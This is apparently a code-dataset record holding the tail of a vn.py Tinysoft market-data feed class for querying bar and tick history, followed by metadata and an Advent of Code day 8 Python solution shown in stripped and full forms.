)
n: int = self.client.login()
if n != 1:
return False
self.inited = True
return True
def query_bar_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""查询K线数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
tsl_interval: str = INTERVAL_MAP[req.interval]
bars: List[BarData] = []
start_str: str = req.start.strftime("%Y%m%d")
end_str: str = req.end.strftime("%Y%m%d")
cmd: str = (
f"setsysparam(pn_cycle(),{tsl_interval}());"
"return select * from markettable "
f"datekey {start_str}T to {end_str}T "
f"of '{tsl_exchange}{symbol}' end;"
)
result = self.client.exec(cmd)
if not result.error():
data = result.value()
shift: timedelta = SHIFT_MAP.get(req.interval, None)
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
if shift:
dt -= shift
bar: BarData = BarData(
symbol=symbol,
exchange=exchange,
datetime=CHINA_TZ.localize(dt),
interval=req.interval,
open_price=d["open"],
high_price=d["high"],
low_price=d["low"],
close_price=d["close"],
volume=d["vol"],
turnover=d["amount"],
gateway_name="TSL"
)
# for futures, also read the open interest field
if not tsl_exchange:
bar.open_interest = d["sectional_cjbs"]
bars.append(bar)
return bars
def query_tick_history(self, req: HistoryRequest) -> Optional[List[TickData]]:
"""查询Tick数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
ticks: List[TickData] = []
dt: datetime = req.start
while dt <= req.end:
date_str: str = dt.strftime("%Y%m%d")
cmd: str = f"return select * from tradetable datekey {date_str}T to {date_str}T+16/24 of '{tsl_exchange}{symbol}' end ; "
result = self.client.exec(cmd)
if not result.error():
data = result.value()
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
dt: datetime = CHINA_TZ.localize(dt)
tick: TickData = TickData(
symbol=symbol,
exchange=exchange,
name=d["StockName"],
datetime=dt,
open_price=d["sectional_open"],
high_price=d["sectional_high"],
low_price=d["sectional_low"],
last_price=d["price"],
volume=d["sectional_vol"],
turnover=d["sectional_amount"],
bid_price_1=d["buy1"],
bid_price_2=d["buy2"],
bid_price_3=d["buy3"],
bid_price_4=d["buy4"],
bid_price_5=d["buy5"],
ask_price_1=d["sale1"],
ask_price_2=d["sale2"],
ask_price_3=d["sale3"],
ask_price_4=d["sale4"],
ask_price_5=d["sale5"],
bid_volume_1=d["bc1"],
bid_volume_2=d["bc2"],
bid_volume_3=d["bc3"],
bid_volume_4=d["bc4"],
bid_volume_5=d["bc5"],
ask_volume_1=d["sc1"],
ask_volume_2=d["sc2"],
ask_volume_3=d["sc3"],
ask_volume_4=d["sc4"],
ask_volume_5=d["sc5"],
localtime=dt,
gateway_name="TSL"
)
# for futures, also read the open interest field
if not tsl_exchange:
tick.open_interest = d["sectional_cjbs"]
ticks.append(tick)
dt += timedelta(days=1)
return ticks
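A hedged usage sketch: request daily bars through the datafeed. It assumes valid datafeed.username / datafeed.password entries in vn.py's SETTINGS; the symbol and dates are illustrative.
from datetime import datetime
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import HistoryRequest

datafeed = TinysoftDatafeed()
req = HistoryRequest(
    symbol="600000",  # illustrative SSE symbol
    exchange=Exchange.SSE,
    start=datetime(2022, 1, 4),
    end=datetime(2022, 1, 28),
    interval=Interval.DAILY,
)
bars = datafeed.query_bar_history(req)  # init() is called internally if needed
print(len(bars) if bars else 0)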
| 0
| 0
| 0
|
e2d1dcb2354936fd158943bcf5fefb6597f1fd28
| 1,203
|
py
|
Python
|
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
| 23.134615
| 78
| 0.47714
|
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
def rect(x,y):
global arr
for i in range(x):
for j in range(y):
print(i,j)
arr[j][i] = 1
def rotatecol(x,n):
global arr
for _ in range(n):
first = arr[5][x]
for i in range(5,0,-1):
arr[i][x] = arr[i-1][x]
arr[0][x] = first
print(arr)
def rotaterow(y,n):
global arr
for _ in range(n):
first = arr[y][49]
for i in range(49,0,-1):
arr[y][i] = arr[y][i-1]
arr[y][0] = first
print(arr)
def countpixels():
c = 0
for i in range(50):
for j in range(6):
if arr[j][i] == 1:
c += 1
return c
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
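A hedged note on input format: the parser above expects one instruction per line in input_d8.txt, for example (sample lines only, not the real puzzle input):
sample_lines = "rect 3x2\nrotate column x=1 by 1\nrotate row y=0 by 4\n"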
| 584
| 0
| 92
|